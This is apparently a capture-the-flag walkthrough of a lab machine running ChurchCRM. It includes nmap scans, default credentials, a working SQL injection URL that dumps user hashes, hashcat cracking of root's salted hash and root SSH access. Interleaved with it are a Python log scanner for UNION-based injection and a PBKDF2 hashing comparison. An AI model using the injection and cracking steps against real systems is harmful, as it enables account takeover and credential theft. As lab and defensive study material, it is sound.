groove

Enum

sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP 
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p- -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP

Services:

Discovered open port 22/tcp on 192.168.245.44
Discovered open port 80/tcp on 192.168.245.44

80:


Default creds work:

Admin:changeme

Exploit-DB hit: ChurchCRM 4.5.1 - Authenticated SQL Injection (php/webapps/51319.py)

Before doing this, let's see if we can just upload a PHP shell with our access.

Could not find a spot for that, so let's try the exploit script:

➜  groove python3 51319.py http://192.168.245.44 Admin changeme

The script did not work, but reading the exploit manually shows the injection can be reproduced by requesting the URL directly:

http://192.168.245.44/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT(%27Perseverance%27,usr_Username,%27:%27,usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday%20School

Dumped hashes:

Admin:4bdf3fba58c956fc3991a1fde84929223f968e2853de596e49ae80a91499609b
root:33b8fc76a24681b67a9431b632548d069336202bed5828fe431711a8e5b52d1b
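From the defender's side, the UNION-based request above is easy to spot in web-server access logs once the query string is URL-decoded. The following is an added example, not part of the original writeup or of ChurchCRM: a small Python scanner over constructed (not real) access-log lines that flags requests whose decoded query contains a UNION ... SELECT, matched as whole words so ordinary text such as "reunion selection" is not reported.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Common Log Format); not taken from the original page.
# The second request mirrors the shape of the injection described in the writeup.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /EventAttendance.php?Action=List&Event=2&Type=Sunday%20School HTTP/1.1" 200 5120
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT(%27x%27,usr_Username,%27:%27,usr_Password),NULL+from+user_usr--+-&Type=Sunday%20School HTTP/1.1" 200 7811
192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 900
192.0.2.12 - - [01/Jan/2024:10:02:00 +0000] "GET /search.php?q=reunion+selection HTTP/1.1" 200 300
"""

# Client IP, timestamp, method and request target of one CLF line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# UNION, optionally ALL/DISTINCT, then SELECT, all as whole words and case-insensitive.
UNION_RE = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b", re.IGNORECASE)


def decode_query(target):
    """Return the URL-decoded query string of a request target ('' if it has none)."""
    return unquote_plus(urlsplit(target).query)


def is_union_injection(target):
    """True if the decoded query string of the target carries a UNION ... SELECT."""
    return bool(UNION_RE.search(decode_query(target)))


def scan_log(text):
    """Return (ip, timestamp, target) for every parsable request that matches."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m is None:
            continue  # skip lines that are not in Common Log Format
        if is_union_injection(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, ts, target in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {target}")
```

The scanner decodes the query string once, so a payload that is double-encoded would slip past it; a real deployment should normalise the request the same way the application does before matching, and should treat a hit on an authenticated endpoint like EventAttendance.php as a reason to review that account's session, not just the request.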

This github issue:

explains that the hash salt is the user ID.

root is user ID 2, so the salt for its hash is 2.

hashcat -m 1410 -a 0 33b8fc76a24681b67a9431b632548d069336202bed5828fe431711a8e5b52d1b:2  /usr/share/wordlists/rockyou.txt
artistakeichelleko2007
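hashcat mode 1410 is sha256($pass.$salt): a single unsalted-strength SHA-256 over the password with the salt appended, and here the "salt" is a user ID that the attacker already reads out of the same table. The following is an added example, not code from the original page or from ChurchCRM: it reproduces that scheme in Python so the -m 1410 choice is verifiable, and puts a hardened alternative (PBKDF2-HMAC-SHA256 with a random per-user salt, an assumption about what the application could store) next to it. The storage format "pbkdf2$iterations$salt$hash" is this example's own convention.

```python
import hashlib
import hmac
import os


def legacy_churchcrm_hash(password, user_id):
    """The scheme the writeup describes: SHA-256 over password followed by the
    user ID as a string. This is exactly hashcat mode 1410, sha256($pass.$salt)."""
    return hashlib.sha256((password + str(user_id)).encode()).hexdigest()


def legacy_verify(stored_hex, password, user_id):
    """Constant-time comparison against a stored legacy hash."""
    return hmac.compare_digest(stored_hex, legacy_churchcrm_hash(password, user_id))


# Hardened alternative (assumption: the application can store a salt next to the hash).
PBKDF2_ITERATIONS = 600_000  # current OWASP guidance for PBKDF2-HMAC-SHA256


def hardened_hash(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt.
    Returns the record 'pbkdf2$<iterations>$<salt hex>$<derived key hex>'."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "pbkdf2${}${}${}".format(PBKDF2_ITERATIONS, salt.hex(), dk.hex())


def hardened_verify(stored, password):
    """Re-derive with the stored salt and iteration count; constant-time compare."""
    try:
        scheme, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False  # malformed record
    if scheme != "pbkdf2":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # Constructed demo values, not the hashes from the writeup.
    print(legacy_churchcrm_hash("correct horse", 2))
    record = hardened_hash("correct horse")
    print(record, hardened_verify(record, "correct horse"))
```

Two things the comparison makes visible: with the legacy scheme a known user ID turns the salt into a constant, so every candidate password costs one SHA-256 (which is why a rockyou.txt run finishes in seconds), whereas the PBKDF2 record carries an unpredictable salt and an iteration count that makes each guess hundreds of thousands of times more expensive. A migration would re-hash on next successful login rather than trying to convert the stored SHA-256 values.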

SSH in as root with the cracked password.

proof

c0f9e77a0572f4853aae5e64f6c19d51